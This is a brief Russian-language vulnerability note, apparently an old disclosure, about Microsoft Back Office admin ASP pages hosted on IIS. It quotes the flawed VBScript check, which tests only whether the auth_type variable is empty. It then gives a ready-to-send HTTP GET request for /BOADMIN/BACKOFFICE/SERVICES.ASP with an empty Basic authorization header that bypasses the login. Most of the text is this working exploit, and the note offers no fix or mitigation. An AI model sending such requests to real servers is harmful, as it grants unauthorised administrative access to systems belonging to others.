Microsoft Back Office можно администрировать при
помощи ASP-страниц, хранящихся на IIS. Обычно
для их использования нужно пройти
авторизацию, однако это можно обойти.
Вот процедура, встроенную в каждую
административную страницу для проверки
прав пользователя:
If Request.ServerVariables("auth_type") = "" Then
Response.Status = "401 ACCESS DENIED"
Response.End
End If
Следовательно обойти ее очень просто:
GET /BOADMIN/BACKOFFICE/SERVICES.ASP HTTP/1.1
Host: hostname
Authorization: Basic
[enter]
[enter]
